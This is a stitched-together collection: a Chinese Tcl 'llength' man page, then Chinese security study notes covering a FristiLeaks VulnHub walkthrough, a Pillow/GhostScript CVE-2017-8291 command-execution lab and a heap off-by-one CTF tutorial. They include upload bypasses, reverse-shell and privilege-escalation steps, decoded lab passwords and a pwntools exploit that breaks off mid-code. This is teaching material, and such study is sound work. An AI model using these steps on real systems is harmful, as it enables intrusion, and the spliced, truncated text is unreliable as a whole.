\\n(^b \{\ .\" Draw three-sided box if this is the box's first page, .\" draw two sides but no top otherwise. .ie !\\n(^b-1 \h'-1.5n'\L'|\\n(^yu-1v'\l'\\n(^lu+3n\(ul'\L'\\n(^tu+1v-\\n(^yu'\h'|0u'\c .el \h'-1.5n'\L'|\\n(^yu-1v'\h'\\n(^lu+3n'\L'\\n(^tu+1v-\\n(^yu'\h'|0u'\c .\} .if \\n(^v \{\ .nr ^x \\n(^tu+1v-\\n(^Yu \kx\h'-\\nxu'\h'|\\n(^lu+3n'\ky\L'-\\n(^xu'\v'\\n(^xu'\h'|0u'\c .\} .bp 'fi .ev .if \\n(^b \{\ .mk ^y .nr ^b 2 .\} .if \\n(^v \{\ .mk ^Y .\} .. '\" # DS - begin display .de DS .RS .nf .sp .. '\" # DE - end display .de DE .fi .RE .sp .. '\" # SO - start of list of standard options .de SO .SH "STANDARD OPTIONS" .LP .nf .ta 5.5c 11c .ft B .. '\" # SE - end of list of standard options .de SE .fi .ft R .LP See the \\fBoptions\\fR manual entry for details on the standard options. .. '\" # OP - start of full description for a single option .de OP .LP .nf .ta 4c Command-Line Name: \\fB\\$1\\fR Database Name: \\fB\\$2\\fR Database Class: \\fB\\$3\\fR .fi .IP .. '\" # CS - begin code excerpt .de CS .RS .nf .ta .25i .5i .75i 1i .. '\" # CE - end code excerpt .de CE .fi .RE .. .de UL \\$1\l'|0\(ul'\\$2 .. .TH llength 3tcl "" Tcl "Tcl Built-In Commands" .BS '\" Note: do not modify the .SH NAME line immediately below! .SH NAME llength \- 统计在一个列表中元素的个数 .SH "总览 SYNOPSIS" \fBllength \fIlist\fR .BE .SH "描述 DESCRIPTION" .PP 把 \fIlist\fR 作为一个列表对待并返回给出在列表中元素个数的一个十进制数的字符串。 .SH "参见 SEE ALSO" list(n), lindex(n), lrange(n) .SH "关键字 KEYWORDS" element, list, length .SH "[中文版维护人]" .B 寒蝉退士 .SH "[中文版最新更新]" .B 2001/06/21 .SH "《中国 Linux 论坛 man 手册页翻译计划》:" .BI http://cmpp.linuxforum.net
sec-knowleage
# FristiLeaks:1.3 下载地址: ``` https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova ``` ## 实战操作 需要修改MAC地址为:`08:00:27:A5:A6:76`。 ![](<../../.gitbook/assets/image (13) (1) (1) (1) (1) (1).png>) 靶机IP地址:`192.168.0.13`。 扫描IP地址 ``` ┌──(root💀kali)-[~/Desktop] └─# nmap -p1-65535 192.168.0.13 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-21 04:43 EST Nmap scan report for 192.168.0.13 Host is up (0.00038s latency). Not shown: 65534 filtered ports PORT STATE SERVICE 80/tcp open http MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 150.67 seconds ``` ``` ┌──(root💀kali)-[~/Desktop] └─# nikto -h http://192.168.0.13/ - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.0.13 + Target Hostname: 192.168.0.13 + Target Port: 80 + Start Time: 2021-12-21 04:48:02 (GMT-5) --------------------------------------------------------------------------- + Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3 + Server may leak inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Tue Nov 17 13:45:47 2015 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Entry '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + "robots.txt" contains 3 entries which should be manually viewed. + PHP/5.3.3 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch. + Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3268: /images/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + 8727 requests: 0 error(s) and 15 item(s) reported on remote host + End Time: 2021-12-21 04:48:24 (GMT-5) (22 seconds) --------------------------------------------------------------------------- + 1 host(s) tested ``` 浏览器打开80端口,首页是一个图片。 ![](<../../.gitbook/assets/image (16) (1) (1) (1) (1).png>) 按照nikito扫描到内容,存在robots.txt。但是遗憾的是,这三个目录都是没有价值的。 ![](<../../.gitbook/assets/image (15) (1) (1) (1) (1) (1) (1) (1).png>) 我尝试把首页各个词汇做成目录爆破字典,但是也不存在。 ``` ┌──(root💀kali)-[/tmp] └─# cat /tmp/1.txt meneer barrebas rikvduijn wez3forsec PyroBatNL 0xDUDE annejanbrouwer Sander2121 Reinierk DearCharles miamat MisterXE BasB Dwight Egeltje pdersjant tcp130x10 spierenburg ielmatani renepieters Mystery guest EQ_uinix WhatSecurity mramsmeets Ar0xA @meneer @barrebas @rikvduijn @wez3forsec @PyroBatNL @0xDUDE @annejanbrouwer @Sander2121 Reinierk @DearCharles @miamat MisterXE BasB Dwight Egeltje @pdersjant @tcp130x10 @spierenburg @ielmatani @renepieters Mystery guest @EQ_uinix @WhatSecurity @mramsmeets @Ar0xA ┌──(root💀kali)-[/tmp] └─# dirb http://192.168.0.13/ /tmp/1.txt ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Tue Dec 21 05:04:35 2021 URL_BASE: http://192.168.0.13/ WORDLIST_FILES: /tmp/1.txt ----------------- GENERATED WORDS: 44 ---- Scanning URL: http://192.168.0.13/ ---- ----------------- END_TIME: Tue Dec 21 05:04:35 2021 DOWNLOADED: 44 - FOUND: 0 ``` 回归到首页,我发现图片的first多了一个I,于是成功发现它的目录。 ![](<../../.gitbook/assets/image (7) (1).png>) 输入一些注入语句发现不生效,右键查看页面源代码,找到作者的注释。 ![](<../../.gitbook/assets/image (13) (1) (1) (1) (1).png>) 继续往下翻,找到一串base64加密字符串,最后解密是一张图片 ![](<../../.gitbook/assets/image (15) (1) (1) (1) (1) (1) (1) (2).png>) 或者这样解密 ``` cat enc | base64 --decode > dec.png ``` 根据这两张图片分析找到账号和密码:`eezeepz/keKkeKKeKKeKkEkkEk`。并用其进行登录 ![](<../../.gitbook/assets/image (17) (1) (1) (1) (1) (1) (1).png>) 上传功能只允许jpg、png、gif图片格式上传,修改一下后缀,绕过上传。 ![](<../../.gitbook/assets/image (21) (1) (1) (1) (1).png>) NC进行反弹shell。 ![](<../../.gitbook/assets/image (14) (1) (1) (1) (1) (1) (1).png>) 使用python使终端shell稳定。 ``` python -c 'import pty; pty.spawn("/bin/bash")' ``` 来到`/home/eezeepz`目录下面,查看笔记内容,笔记大概说可执行命令在/home/admin里面,然后你需要在/tmp/runthis生成命令行才可以执行(定时计划)。 ``` cat notes.txt Yo EZ, I made it possible for you to do some automated checks, but I did only allow you access to /usr/bin/* system binaries. I did however copy a few extra often needed commands to my homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those from /home/admin/ Don't forget to specify the full path for each binary! Just put a file called "runthis" in /tmp/, each line one command. The output goes to the file "cronresult" in /tmp/. It should run every minute with my account privileges. - Jerry ``` 等大概一分钟就可以授权完毕。 ``` bash-4.1$ echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis echo "/home/admin/chmod 777 /home/admin" > /tmp/runthis bash-4.1$ ls /home/admin ls /home/admin cat cronjob.py cryptpass.py echo grep whoisyourgodnow.txt chmod cryptedpass.txt df egrep ps ``` 其中在`/home/admin`目录发现一些加密文件和加密脚本。 ``` bash-4.1$ ls ls cat cronjob.py cryptpass.py echo grep whoisyourgodnow.txt chmod cryptedpass.txt df egrep ps bash-4.1$ cat cryptedpass.txt cat cryptedpass.txt mVGZ3O3omkJLmy2pcuTq bash-4.1$ cat whoisyourgodnow.txt cat whoisyourgodnow.txt =RFn0AKnlMHMPIzpyuTI0ITG bash-4.1$ cat cryptpass.py cat cryptpass.py #Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn import base64,codecs,sys def encodeString(str): base64string= base64.b64encode(str) return codecs.encode(base64string[::-1], 'rot13') cryptoResult=encodeString(sys.argv[1]) print cryptoResult bash-4.1$ ``` 根据上面加密脚本反推解密脚本,加密过程:字符串base64加密,然后字符串顺序倒转,最后每个字符移动13位;解密过程:同样移动13位,这样原来字母位置没有变化,再把字符串顺序倒转,再进行base64解码。 ![](<../../.gitbook/assets/image (27) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) ``` import base64,codecs def decodeString(enstr): a = codecs.encode(enstr, 'rot13') b = a[::-1] c = base64.b64decode(b) return c d = decodeString('mVGZ3O3omkJLmy2pcuTq') e = decodeString('=RFn0AKnlMHMPIzpyuTI0ITG') print d print e thisisalsopw123 LetThereBeFristi! ``` 我们已经找到两个密码,这时候查看/etc/passwd文件找用户去登录。 ``` sh-4.1$ cat /etc/passwd cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash vboxadd:x:498:1::/var/run/vboxadd:/bin/false eezeepz:x:500:500::/home/eezeepz:/bin/bash admin:x:501:501::/home/admin:/bin/bash fristigod:x:502:502::/var/fristigod:/bin/bash fristi:x:503:100::/var/www:/sbin/nologin ``` 测试`fristigod/LetThereBeFristi!`登录成功 ``` bash-4.1$ su fristigod su fristigod Password: LetThereBeFristi! bash-4.1$ whoami whoami fristigod bash-4.1$ ``` 查看sudo支持命令 ``` sudo -l [sudo] password for fristigod: LetThereBeFristi! Matching Defaults entries for fristigod on this host: requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin User fristigod may run the following commands on this host: (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom ``` 按照提示需要调用`fristi`用户`doCom`命令才可以提权。 ``` bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash bash-4.1# whoami whoami root bash-4.1# ls /root ls /root fristileaks_secrets.txt bash-4.1# cat /root/LC_IDENTIFICATION cat /root/LC_IDENTIFICATION cat: /root/LC_IDENTIFICATION: No such file or directory bash-4.1# cat /root/fristileaks_secrets.txt cat /root/fristileaks_secrets.txt Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu] I wonder if you beat it in the maximum 4 hours it's supposed to take! Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode) Flag: Y0u_kn0w_y0u_l0ve_fr1st1 ```
sec-knowleage
# Python PIL 远程命令执行漏洞(GhostButt ) Python中处理图片的模块PIL(Pillow),因为其内部调用了GhostScript而受到GhostButt漏洞(CVE-2017-8291)的影响,造成远程命令执行漏洞。 漏洞详情: - http://blog.neargle.com/2017/09/28/Exploiting-Python-PIL-Module-Command-Execution-Vulnerability/ ## 漏洞简述 PIL内部根据图片头(Magic Bytes)判断图片类型,如果发现是一个eps文件(头为`%!PS`),则分发给`PIL/EpsImagePlugin.py`处理。 在这个模块中,PIL调用了系统的gs命令,也就是GhostScript来处理图片文件: ```python command = ["gs", "-q", # quiet mode "-g%dx%d" % size, # set output geometry (pixels) "-r%fx%f" % res, # set input DPI (dots per inch) "-dBATCH", # exit after processing "-dNOPAUSE", # don't pause between pages, "-dSAFER", # safe mode "-sDEVICE=ppmraw", # ppm driver "-sOutputFile=%s" % outfile, # output file "-c", "%d %d translate" % (-bbox[0], -bbox[1]), # adjust for image origin "-f", infile, # input file ] # 省略判断是GhostScript是否安装的代码 try: with open(os.devnull, 'w+b') as devnull: subprocess.check_call(command, stdin=devnull, stdout=devnull) im = Image.open(outfile) ``` 虽然设置了`-dSAFER`,也就是安全模式,但因为GhostScript的一个沙盒绕过漏洞(GhostButt CVE-2017-8291),导致这个安全模式被绕过,可以执行任意命令。 另外,截至目前,GhostScript官方最新版9.21仍然受到这个漏洞影响,所以可以说:只要操作系统上安装了GhostScript,我们的PIL就存在命令执行漏洞。 ## 漏洞测试 运行环境: ``` docker compose up -d ``` 运行后,访问`http://your-ip:8000/`即可看到一个上传页面。正常功能是我们上传一个PNG文件,后端调用PIL加载图片,输出长宽。但我们可以将可执行命令EPS文件后缀改成PNG进行上传,因为后端是根据文件头来判断图片类型,所以无视后缀检查。 比如[poc.png](poc.png),我们上传之,即可执行`touch /tmp/aaaaa`。将POC中的命令改为反弹命令,即可获得shell: ![](01.png)
sec-knowleage
# 堆中的 Off-By-One ## 介绍 严格来说 off-by-one 漏洞是一种特殊的溢出漏洞,off-by-one 指程序向缓冲区中写入时,写入的字节数超过了这个缓冲区本身所申请的字节数并且只越界了一个字节。 ## off-by-one 漏洞原理 off-by-one 是指单字节缓冲区溢出,这种漏洞的产生往往与边界验证不严和字符串操作有关,当然也不排除写入的 size 正好就只多了一个字节的情况。其中边界验证不严通常包括 - 使用循环语句向堆块中写入数据时,循环的次数设置错误(这在 C 语言初学者中很常见)导致多写入了一个字节。 - 字符串操作不合适 一般来说,单字节溢出被认为是难以利用的,但是因为 Linux 的堆管理机制 ptmalloc 验证的松散性,基于 Linux 堆的 off-by-one 漏洞利用起来并不复杂,并且威力强大。 此外,需要说明的一点是 off-by-one 是可以基于各种缓冲区的,比如栈、bss 段等等,但是堆上(heap based) 的 off-by-one 是 CTF 中比较常见的。我们这里仅讨论堆上的 off-by-one 情况。 ## off-by-one 利用思路 1. 溢出字节为可控制任意字节:通过修改大小造成块结构之间出现重叠,从而泄露其他块数据,或是覆盖其他块数据。也可使用 NULL 字节溢出的方法 2. 溢出字节为 NULL 字节:在 size 为 0x100 的时候,溢出 NULL 字节可以使得 `prev_in_use` 位被清,这样前块会被认为是 free 块。(1) 这时可以选择使用 unlink 方法(见 unlink 部分)进行处理。(2) 另外,这时 `prev_size` 域就会启用,就可以伪造 `prev_size` ,从而造成块之间发生重叠。此方法的关键在于 unlink 的时候没有检查按照 `prev_size` 找到的块的大小与`prev_size` 是否一致。 最新版本代码中,已加入针对 2 中后一种方法的 check ,但是在 2.28 及之前版本并没有该 check 。 ``` /* consolidate backward */ if (!prev_inuse(p)) { prevsize = prev_size (p); size += prevsize; p = chunk_at_offset(p, -((long) prevsize)); /* 后两行代码在最新版本中加入,则 2 的第二种方法无法使用,但是 2.28 及之前都没有问题 */ if (__glibc_unlikely (chunksize(p) != prevsize)) malloc_printerr ("corrupted size vs. prev_size while consolidating"); unlink_chunk (av, p); } ``` ### 示例 1 ``` int my_gets(char *ptr,int size) { int i; for(i=0;i<=size;i++) { ptr[i]=getchar(); } return i; } int main() { void *chunk1,*chunk2; chunk1=malloc(16); chunk2=malloc(16); puts("Get Input:"); my_gets(chunk1,16); return 0; } ``` 我们自己编写的 my_gets 函数导致了一个 off-by-one 漏洞,原因是 for 循环的边界没有控制好导致写入多执行了一次,这也被称为栅栏错误 > wikipedia: > 栅栏错误(有时也称为电线杆错误或者灯柱错误)是差一错误的一种。如以下问题: > > 建造一条直栅栏(即不围圈),长 30 米、每条栅栏柱间相隔 3 米,需要多少条栅栏柱? > > 最容易想到的答案 10 是错的。这个栅栏有 10 个间隔,11 条栅栏柱。 我们使用 gdb 对程序进行调试,在进行输入前可以看到分配的两个用户区域为 16 字节的堆块 ``` 0x602000: 0x0000000000000000 0x0000000000000021 <=== chunk1 0x602010: 0x0000000000000000 0x0000000000000000 0x602020: 0x0000000000000000 0x0000000000000021 <=== chunk2 0x602030: 0x0000000000000000 0x0000000000000000 ``` 当我们执行 my_gets 进行输入之后,可以看到数据发生了溢出覆盖到了下一个堆块的 prev_size 域 print 'A'*17 ``` 0x602000: 0x0000000000000000 0x0000000000000021 <=== chunk1 0x602010: 0x4141414141414141 0x4141414141414141 0x602020: 0x0000000000000041 0x0000000000000021 <=== chunk2 0x602030: 0x0000000000000000 0x0000000000000000 ``` ### 示例 2 第二种常见的导致 off-by-one 的场景就是字符串操作了,常见的原因是字符串的结束符计算有误 ``` int main(void) { char buffer[40]=""; void *chunk1; chunk1=malloc(24); puts("Get Input"); gets(buffer); if(strlen(buffer)==24) { strcpy(chunk1,buffer); } return 0; } ``` 程序乍看上去没有任何问题(不考虑栈溢出),可能很多人在实际的代码中也是这样写的。 但是 strlen 和 strcpy 的行为不一致却导致了 off-by-one 的发生。 strlen 是我们很熟悉的计算 ascii 字符串长度的函数,这个函数在计算字符串长度时是不把结束符 `'\x00'` 计算在内的,但是 strcpy 在复制字符串时会拷贝结束符 `'\x00'` 。这就导致了我们向 chunk1 中写入了 25 个字节,我们使用 gdb 进行调试可以看到这一点。 ``` 0x602000: 0x0000000000000000 0x0000000000000021 <=== chunk1 0x602010: 0x0000000000000000 0x0000000000000000 0x602020: 0x0000000000000000 0x0000000000000411 <=== next chunk ``` 在我们输入'A'*24 后执行 strcpy ``` 0x602000: 0x0000000000000000 0x0000000000000021 0x602010: 0x4141414141414141 0x4141414141414141 0x602020: 0x4141414141414141 0x0000000000000400 ``` 可以看到 next chunk 的 size 域低字节被结束符 `'\x00'` 覆盖,这种又属于 off-by-one 的一个分支称为 NULL byte off-by-one,我们在后面会看到 off-by-one 与 NULL byte off-by-one 在利用上的区别。 还是有一点就是为什么是低字节被覆盖呢,因为我们通常使用的 CPU 的字节序都是小端法的,比如一个 DWORD 值在使用小端法的内存中是这样储存的 ``` DWORD 0x41424344 内存 0x44,0x43,0x42,0x41 ``` ### 在 libc-2.29 之后 由于这两行代码的加入 ```cpp if (__glibc_unlikely (chunksize(p) != prevsize)) malloc_printerr ("corrupted size vs. prev_size while consolidating"); ``` 由于我们难以控制一个真实 chunk 的 size 字段,所以传统的 off-by-null 方法失效。但是,只需要满足被 unlink 的 chunk 和下一个 chunk 相连,所以仍然可以伪造 fake_chunk。 伪造的方式就是使用 large bin 遗留的 fd_nextsize 和 bk_nextsize 指针。以 fd_nextsize 为 fake_chunk 的 fd,bk_nextsize 为 fake_chunk 的 bk,这样我们可以完全控制该 fake_chunk 的 size 字段(这个过程会破坏原 large bin chunk 的 fd 指针,但是没有关系),同时还可以控制其 fd(通过部分覆写 fd_nextsize)。通过在后面使用其他的 chunk 辅助伪造,可以通过该检测 ```  if (__glibc_unlikely (chunksize(p) != prevsize))    malloc_printerr ("corrupted size vs. prev_size while consolidating"); ``` 然后只需要通过 unlink 的检测就可以了,也就是 `fd->bk == p && bk->fd == p` 如果 large bin 中仅有一个 chunk,那么该 chunk 的两个 nextsize 指针都会指向自己,如下 我们可以控制 fd_nextsize 指向堆上的任意地址,可以容易地使之指向一个 fastbin + 0x10 - 0x18,而 fastbin 中的 fd 也会指向堆上的一个地址,通过部分覆写该指针也可以使该指针指向之前的 large bin + 0x10,这样就可以通过 `fd->bk == p` 的检测。 由于 bk_nextsize 我们无法修改,所以 bk->fd 必然在原先的 large bin chunk 的 fd 指针处(这个 fd 被我们破坏了)。通过 fastbin 的链表特性可以做到修改这个指针且不影响其他的数据,再部分覆写之就可以通过 `bk->fd==p` 的检测了。 然后通过 off-by-one 向低地址合并就可以实现 chunk overlapping 了,之后可以 leak libc_base 和 堆地址,tcache 打 __free_hook 即可。 光讲原理比较难理解,建议结合题目学习,比如本文中的实例 3。 ## 实例 1: Asis CTF 2016 [b00ks](https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/heap/off_by_one/Asis_2016_b00ks) ### 题目介绍 题目是一个常见的选单式程序,功能是一个图书管理系统。 ``` 1. Create a book 2. Delete a book 3. Edit a book 4. Print book detail 5. Change current author name 6. Exit ``` 程序提供了创建、删除、编辑、打印图书的功能。题目是 64 位程序,保护如下所示。 ``` Canary : No NX : Yes PIE : Yes Fortify : No RelRO : Full ``` 程序每创建一个 book 会分配 0x20 字节的结构来维护它的信息 ``` struct book { int id; char *name; char *description; int size; } ``` ### create book 结构中存在 name 和 description , name 和 description 在堆上分配。首先分配 name buffer ,使用 malloc ,大小自定但小于 32 。 ``` printf("\nEnter book name size: ", *(_QWORD *)&size); __isoc99_scanf("%d", &size); printf("Enter book name (Max 32 chars): ", &size); ptr = malloc(size); ``` 之后分配 description ,同样大小自定但无限制。 ``` printf("\nEnter book description size: ", *(_QWORD *)&size); __isoc99_scanf("%d", &size); v5 = malloc(size); ``` 之后分配 book 结构的内存 ``` book = malloc(0x20uLL); if ( book ) { *((_DWORD *)book + 6) = size; *((_QWORD *)off_202010 + v2) = book; *((_QWORD *)book + 2) = description; *((_QWORD *)book + 1) = name; *(_DWORD *)book = ++unk_202024; return 0LL; } ``` ### 漏洞 程序编写的 read 函数存在 null byte off-by-one 漏洞,仔细观察这个 read 函数可以发现对于边界的考虑是不当的。 ``` signed __int64 __fastcall my_read(_BYTE *ptr, int number) { int i; // [rsp+14h] [rbp-Ch] _BYTE *buf; // [rsp+18h] [rbp-8h] if ( number <= 0 ) return 0LL; buf = ptr; for ( i = 0; ; ++i ) { if ( (unsigned int)read(0, buf, 1uLL) != 1 ) return 1LL; if ( *buf == '\n' ) break; ++buf; if ( i == number ) break; } *buf = 0; return 0LL; } ``` ### 利用 #### 泄漏 因为程序中的 my_read 函数存在 null byte off-by-one ,事实上 my_read 读入的结束符 '\x00' 是写入到 0x555555756060 的位置的。这样当 0x555555756060~0x555555756068 写入 book 指针时就会覆盖掉结束符 '\x00' ,所以这里是存在一个地址泄漏的漏洞。通过打印 author name 就可以获得 pointer array 中第一项的值。 ``` 0x555555756040: 0x6161616161616161 0x6161616161616161 0x555555756050: 0x6161616161616161 0x6161616161616161 <== author name 0x555555756060: 0x0000555555757480 <== pointer array 0x0000000000000000 0x555555756070: 0x0000000000000000 0x0000000000000000 0x555555756080: 0x0000000000000000 0x0000000000000000 ``` 为了实现泄漏,首先在 author name 中需要输入 32 个字节来使得结束符被覆盖掉。之后我们创建 book1 ,这个 book1 的指针会覆盖 author name 中最后的 NULL 字节,使得该指针与 author name 直接连接,这样输出 author name 则可以获取到一个堆指针。 ``` io.recvuntil('Enter author name:') # input author name io.sendline('a' * 32) io.recvuntil('>') # create book1 io.sendline('1') io.recvuntil('Enter book name size:') io.sendline('32') io.recvuntil('Enter book name (Max 32 chars):') io.sendline('object1') io.recvuntil('Enter book description size:') io.sendline('32') io.recvuntil('Enter book description:') io.sendline('object1') io.recvuntil('>') # print book1 io.sendline('4') io.recvuntil('Author:') io.recvuntil('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa') # <== leak book1 book1_addr = io.recv(6) book1_addr = book1_addr.ljust(8,'\x00') book1_addr = u64(book1_addr) ``` #### off-by-one 覆盖指针低字节 程序中同样提供了一种 change 功能, change 功能用于修改 author name ,所以通过 change 可以写入 author name ,利用 off-by-one 覆盖 pointer array 第一个项的低字节。 覆盖掉 book1 指针的低字节后,这个指针会指向 book1 的 description ,由于程序提供了 edit 功能可以任意修改 description 中的内容。我们可以提前在 description 中布置数据伪造成一个 book 结构,这个 book 结构的 description 和 name 指针可以由直接控制。 ``` def off_by_one(addr): addr += 58 io.recvuntil('>')# create fake book in description io.sendline('3') fake_book_data = p64(0x1) + p64(addr) + p64(addr) + pack(0xffff) io.recvuntil('Enter new book description:') io.sendline(fake_book_data) # <== fake book io.recvuntil('>') # change author name io.sendline('5') io.recvuntil('Enter author name:') io.sendline('a' * 32) # <== off-by-one ``` 这里在 description 中伪造了 book ,使用的数据是 p64(0x1)+p64(addr)+p64(addr)+pack(0xffff) 。 其中 addr+58 是为了使指针指向 book2 的指针地址,使得我们可以任意修改这些指针值。 #### 通过栈实现利用 通过前面 2 部分我们已经获得了任意地址读写的能力,读者读到这里可能会觉得下面的操作是显而易见的,比如写 got 表劫持流程或者写 __malloc_hook 劫持流程等。但是这个题目特殊之处在于开启 PIE 并且没有泄漏 libc 基地址的方法,因此我们还需要想一下其他的办法。 这道题的巧妙之处在于在分配第二个 book 时,使用一个很大的尺寸,使得堆以 mmap 模式进行拓展。我们知道堆有两种拓展方式一种是 brk 会直接拓展原来的堆,另一种是 mmap 会单独映射一块内存。 在这里我们申请一个超大的块,来使用 mmap 扩展内存。因为 mmap 分配的内存与 libc 之前存在固定的偏移因此可以推算出 libc 的基地址。 ``` Start End Offset Perm Path 0x0000000000400000 0x0000000000401000 0x0000000000000000 r-x /home/vb/ 桌面 /123/123 0x0000000000600000 0x0000000000601000 0x0000000000000000 r-- /home/vb/ 桌面 /123/123 0x0000000000601000 0x0000000000602000 0x0000000000001000 rw- /home/vb/ 桌面 /123/123 0x00007f8d638a3000 0x00007f8d63a63000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/libc-2.23.so 0x00007f8d63a63000 0x00007f8d63c63000 0x00000000001c0000 --- /lib/x86_64-linux-gnu/libc-2.23.so 0x00007f8d63c63000 0x00007f8d63c67000 0x00000000001c0000 r-- /lib/x86_64-linux-gnu/libc-2.23.so 0x00007f8d63c67000 0x00007f8d63c69000 0x00000000001c4000 rw- /lib/x86_64-linux-gnu/libc-2.23.so 0x00007f8d63c69000 0x00007f8d63c6d000 0x0000000000000000 rw- 0x00007f8d63c6d000 0x00007f8d63c93000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/ld-2.23.so 0x00007f8d63e54000 0x00007f8d63e79000 0x0000000000000000 rw- <=== mmap 0x00007f8d63e92000 0x00007f8d63e93000 0x0000000000025000 r-- /lib/x86_64-linux-gnu/ld-2.23.so 0x00007f8d63e93000 0x00007f8d63e94000 0x0000000000026000 rw- /lib/x86_64-linux-gnu/ld-2.23.so 0x00007f8d63e94000 0x00007f8d63e95000 0x0000000000000000 rw- 0x00007ffdc4f12000 0x00007ffdc4f33000 0x0000000000000000 rw- [stack] 0x00007ffdc4f7a000 0x00007ffdc4f7d000 0x0000000000000000 r-- [vvar] 0x00007ffdc4f7d000 0x00007ffdc4f7f000 0x0000000000000000 r-x [vdso] 0xffffffffff600000 0xffffffffff601000 0x0000000000000000 r-x [vsyscall] ``` ``` Start End Offset Perm Path 0x0000000000400000 0x0000000000401000 0x0000000000000000 r-x /home/vb/ 桌面 /123/123 0x0000000000600000 0x0000000000601000 0x0000000000000000 r-- /home/vb/ 桌面 /123/123 0x0000000000601000 0x0000000000602000 0x0000000000001000 rw- /home/vb/ 桌面 /123/123 0x00007f6572703000 0x00007f65728c3000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/libc-2.23.so 0x00007f65728c3000 0x00007f6572ac3000 0x00000000001c0000 --- /lib/x86_64-linux-gnu/libc-2.23.so 0x00007f6572ac3000 0x00007f6572ac7000 0x00000000001c0000 r-- /lib/x86_64-linux-gnu/libc-2.23.so 0x00007f6572ac7000 0x00007f6572ac9000 0x00000000001c4000 rw- /lib/x86_64-linux-gnu/libc-2.23.so 0x00007f6572ac9000 0x00007f6572acd000 0x0000000000000000 rw- 0x00007f6572acd000 0x00007f6572af3000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/ld-2.23.so 0x00007f6572cb4000 0x00007f6572cd9000 0x0000000000000000 rw- <=== mmap 0x00007f6572cf2000 0x00007f6572cf3000 0x0000000000025000 r-- /lib/x86_64-linux-gnu/ld-2.23.so 0x00007f6572cf3000 0x00007f6572cf4000 0x0000000000026000 rw- /lib/x86_64-linux-gnu/ld-2.23.so 0x00007f6572cf4000 0x00007f6572cf5000 0x0000000000000000 rw- 0x00007fffec566000 0x00007fffec587000 0x0000000000000000 rw- [stack] 0x00007fffec59c000 0x00007fffec59f000 0x0000000000000000 r-- [vvar] 0x00007fffec59f000 0x00007fffec5a1000 0x0000000000000000 r-x [vdso] 0xffffffffff600000 0xffffffffff601000 0x0000000000000000 r-x [vsyscall] ``` #### exploit ```python from pwn import * context.log_level="info" binary = ELF("b00ks") libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") io = process("./b00ks") def createbook(name_size, name, des_size, des): io.readuntil("> ") io.sendline("1") io.readuntil(": ") io.sendline(str(name_size)) io.readuntil(": ") io.sendline(name) io.readuntil(": ") io.sendline(str(des_size)) io.readuntil(": ") io.sendline(des) def printbook(id): io.readuntil("> ") io.sendline("4") io.readuntil(": ") for i in range(id): book_id = 